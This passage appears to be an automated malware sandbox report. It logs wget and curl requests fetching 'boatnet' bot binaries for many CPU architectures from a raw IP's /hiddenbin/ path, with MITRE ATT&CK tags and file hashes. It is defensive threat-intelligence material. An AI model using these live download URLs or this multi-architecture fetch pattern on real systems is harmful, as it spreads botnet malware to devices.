Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:32 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "6e20-62c0963906840"
Accept-Ranges: bytes
Content-Length: 28192
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.ppc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.ppc HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "6e20-62c0963906840"
Accept-Ranges: bytes
Content-Length: 28192
GET

http://154.213.186.64/hiddenbin/boatnet.spc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.spc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:34 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "12c58-62c0963935cc1"
Accept-Ranges: bytes
Content-Length: 76888
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.spc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.spc HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "12c58-62c0963935cc1"
Accept-Ranges: bytes
Content-Length: 76888
GET

http://154.213.186.64/hiddenbin/boatnet.m68k

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:36 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "12420-62c09639358d9"
Accept-Ranges: bytes
Content-Length: 74784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.m68k

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.m68k HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:37 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "12420-62c09639358d9"
Accept-Ranges: bytes
Content-Length: 74784
GET

http://154.213.186.64/hiddenbin/boatnet.sh4

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.sh4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:38 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "113f8-62c0963935cc1"
Accept-Ranges: bytes
Content-Length: 70648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.sh4

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.sh4 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:39 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "113f8-62c0963935cc1"
Accept-Ranges: bytes
Content-Length: 70648

154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.x86

http

948 B
30.8kB
15
26

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.x86

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.x86

http

991 B
30.7kB
17
25

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.x86

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.mips

http

1.4kB
32.5kB
23
27

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.mips

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.mips

http

992 B
32.4kB
17
27

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.mips

HTTP Response

200
154.213.186.64:3778

905 B
754 B
17
14
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arc

http

2.9kB
129.4kB
52
96

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arc

http

3.3kB
129.4kB
61
96

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.i468

http

481 B
652 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.i468

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.i468

http

420 B
596 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.i468

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.i686

http

481 B
652 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.i686

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.i686

http

420 B
596 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.i686

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.x86_64

http

483 B
654 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.x86_64

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.x86_64

http

422 B
598 B
6
4

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.x86_64

HTTP Response

404
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.mpsl

http

1.4kB
33.9kB
24
28

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.mpsl

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.mpsl

http

1.1kB
33.8kB
20
28

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.mpsl

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm

http

1.1kB
30.7kB
17
25

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm

http

1.1kB
30.6kB
19
25

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm5

http

845 B
27.0kB
13
23

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm5

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm5

http

948 B
26.9kB
16
23

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm5

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm6

http

1.2kB
36.2kB
20
29

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm6

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm6

http

1.4kB
36.1kB
24
29

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm6

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm7

http

1.6kB
56.4kB
27
44

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm7

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.arm7

http

1.6kB
56.3kB
29
44

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.arm7

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.ppc

http

1.0kB
29.8kB
16
25

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.ppc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.ppc

http

1.2kB
29.7kB
21
25

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.ppc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.spc

http

2.0kB
80.3kB
35
61

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.spc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.spc

http

2.3kB
80.3kB
42
61

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.spc

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.m68k

http

2.0kB
78.1kB
35
59

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.m68k

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.m68k

http

2.2kB
78.1kB
41
59

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.m68k

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.sh4

http

2.2kB
73.8kB
39
56

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.sh4

HTTP Response

200
154.213.186.64:80

http://154.213.186.64/hiddenbin/boatnet.sh4

http

1.9kB
73.8kB
35
56

HTTP Request

GET http://154.213.186.64/hiddenbin/boatnet.sh4

HTTP Response

200

No results found

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
30KB

MD5
4f16ad7bf124db03b82939cfae92f15e

SHA1
6c6d17f48d583c5d3c002f4fc3a5390642d637fe

SHA256
96d6d379169a9a89a3704fbdeebce0698200440dcd5e6d814a96f2960f463573

SHA512
c01e6c9fd4475b69092e1cc6f9eaadefc54d91dffcee63c1c23f9ad3b392791f0371f841f075a948ce67f8d65387fbaef38c943d67511f9d143d83667e50c2cf

Download Submit
/tmp/WTF

Filesize
121KB

MD5
ec59d866ca314089702cad40a77aeebc

SHA1
4fa9bd7716542472cfa27dc9dc4dd664633af350

SHA256
c9216d4e33ba2a5ad059029216b4401f360e3db0e326975ebf088b8a8588d472

SHA512
d42862983fe554e1ce6873fb9e5763451cf052d97452bcdc92c298a374f922e57d76569d915708a261890088f8da0b881e6407979b497486ce7da7493f3a650b

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/WTF

Filesize
220B

MD5
a8f502a6fb3b7b940e922c951d9e493a

SHA1
fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

SHA256
748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

SHA512
e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

Download Submit
/tmp/WTF

Filesize
75KB

MD5
839f6ad27dac29d4bb109eb01539a914

SHA1
3a477d4e91439b652554cc450c97da6769883b7f

SHA256
58b6d063fdfd52f1f8054fa6223aa31fe4f408d18cb4ad7275b63403b1fcbb0d

SHA512
706816e8ba5558bd80a53c5e8584ee85ee4b4a3a9a4db28916954435d7f98802215cf62b77bf716a93992102c9755853c308e7d235fd61e78d857e463b12e725

Download Submit
/tmp/boatnet.x86

Filesize
28KB

MD5
3630b4a04d550fb036675b516a910399

SHA1
7dd4e3efc4a7713d80ec4b8fbc5c0fd649038e7b

SHA256
a288c8c9d8fd6c92636bef0e8acf08f0d0d20b4108af37cea8385e7ad947dc67

SHA512
e33d21707d574422331610445e4fcdc08b7064f6988c022d27cc3650392940561891bd3ba7d97bc3ee1653ab818c7c815c65b2e8ffa0a14b9c6ea801da499b71

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.